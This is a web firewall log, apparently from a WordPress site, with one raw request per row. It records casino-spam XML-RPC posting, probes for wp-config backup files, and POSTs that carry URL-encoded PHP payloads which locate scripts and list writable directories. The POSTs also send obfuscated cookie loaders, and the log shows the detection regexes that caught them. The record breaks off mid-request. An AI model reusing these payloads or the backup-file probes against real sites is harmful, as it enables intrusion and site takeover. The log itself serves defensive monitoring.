and risk based restrictions to protect themselves from regulatory exposure. Common player mistakes include skipping terms, chasing losses after a losing streak, not setting personal limits, using insecure devices, and failing to verify withdrawal methods ahead of time. A disciplined approach means using demo play to test games, reading terms thoroughly, limiting time and money, and seeking help if gambling becomes a problem. With careful evaluation of licensing, security practices, and responsible gambling tools, players can enjoy non GamStop experiences while maintaining control and minimizing risk.]]><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>title<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>post_status<\/name>\r\n<value><string>publish<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_slug<\/name>\r\n<value><string>non-gamstop-uk-casinos-safe-choices-and-insights<\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>dateCreated<\/name>\r\n<value><dateTime.iso8601>20260514T09:26:50Z<\/dateTime.iso8601><\/value>\r\n<\/member>\r\n<member>\r\n<name>wp_password<\/name>\r\n<value><string><\/string><\/value>\r\n<\/member>\r\n<member>\r\n<name>categories<\/name>\r\n<value><array><data>\r\n<value><string>thenethertheplay.co.uk<\/string><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n<member>\r\n<name>custom_fields<\/name>\r\n<value><array><data>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_title<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK Casinos Safe Choices and Insights Today<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_description<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string>Non-GamStop UK casinos have emerged as a notable option for players in the United Kingdom who want alternatives beyond the entrenched GamStop self...<\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<value><struct>\r\n<member><name>key<\/name>\r\n<value><string>_aioseop_keywords<\/string><\/value><\/member>\r\n<member><name>value<\/name>\r\n<value><string><\/string><\/value><\/member>\r\n<\/struct><\/value>\r\n<\/data><\/array>\r\n<\/value>\r\n<\/member>\r\n\r\n<\/struct><\/value>\r\n<\/param>\r\n<param>\r\n<value><boolean>1<\/boolean><\/value>\r\n<\/param>\r\n<\/params>\r\n<\/methodCall>"]
["2026-05-16 20:48:59","5.255.122.176","GET","\/wp-config.php.old","Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/146.0.0.0 Safari\/537.36","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/wp-config.php.old","GET \/wp-config.php.old HTTP\/1.1\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/146.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:en-US,en;q=0.9\naccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\n\n"]
["2026-05-16 20:48:59","5.255.122.176","GET","\/.wp-config.php.swp","Mozilla\/5.0 (X11; Linux x86_64; rv:150.0) Gecko\/20100101 Firefox\/150.0","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/.wp-config.php.swp","GET \/.wp-config.php.swp HTTP\/1.1\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (X11; Linux x86_64; rv:150.0) Gecko\/20100101 Firefox\/150.0\nhost:dewenlabels.com\naccept-language:en-US,en;q=0.9\naccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\n\n"]
["2026-05-16 20:48:59","5.255.122.176","GET","\/wp-config.php.bak","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/146.0.0.0 Safari\/537.36","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/wp-config.php.bak","GET \/wp-config.php.bak HTTP\/1.1\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/146.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:en-US,en;q=0.9\naccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\n\n"]
["2026-05-16 20:48:59","5.255.122.176","GET","\/wp-config.php~","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/145.0.0.0 Safari\/537.36","url","\\.(bak|inc|old|mdb|sql|php~|swp|java|class)$ >> 1:\/wp-config.php~","GET \/wp-config.php~ HTTP\/1.1\naccept-encoding:gzip\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/145.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:en-US,en;q=0.9\naccept:text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\n\n"]
["2026-05-16 21:45:49","213.209.159.254","POST","\/wp-admin\/network\/plugins.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Re:%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B","POST \/wp-admin\/network\/plugins.php HTTP\/1.1\nsec-fetch-user:?1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=730da3e67a08a749df0620450f4abf2e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvHzHvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYz1vK2AioaMypaDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nsec-fetch-site:none\nsec-fetch-mode:navigate\ncontent-length:250\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-mobile:?0\nsec-fetch-dest:document\nsec-ch-ua-platform:\"Windows\"\n\nRe=%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B"]
["2026-05-16 21:48:51","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> XG:%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B","POST \/ HTTP\/1.1\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvJRpvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaIwo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:250\n\nXG=%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B"]
["2026-05-16 22:19:30","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> yK:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=9502d8dfeef0bdc4da77dd3a93ec6aec; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvrHfvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAlMJS0MJDvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-encoding:gzip,deflate\nsec-fetch-user:?1\n\nyK=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 22:20:00","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> Ox:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\nsec-ch-ua:\"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvG3tvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWcozEyrPV7nJLbMzyfMI9jqKEsL29hqTIhqUZbWUNfWTZcXKgcozAfqJEyVPEjB0O1ozkcozfbWUNcB2I4nKD7sK19MTyyXPVuoz90q3W0LzjuVvx7; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-encoding:gzip,deflate\nsec-fetch-user:?1\n\nOx=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 22:20:19","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> pe:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nupgrade-insecure-requests:1\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-length:3339\nsec-fetch-site:none\nsec-fetch-mode:navigate\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=ce288246c7d2df0454c666077eb603cf; 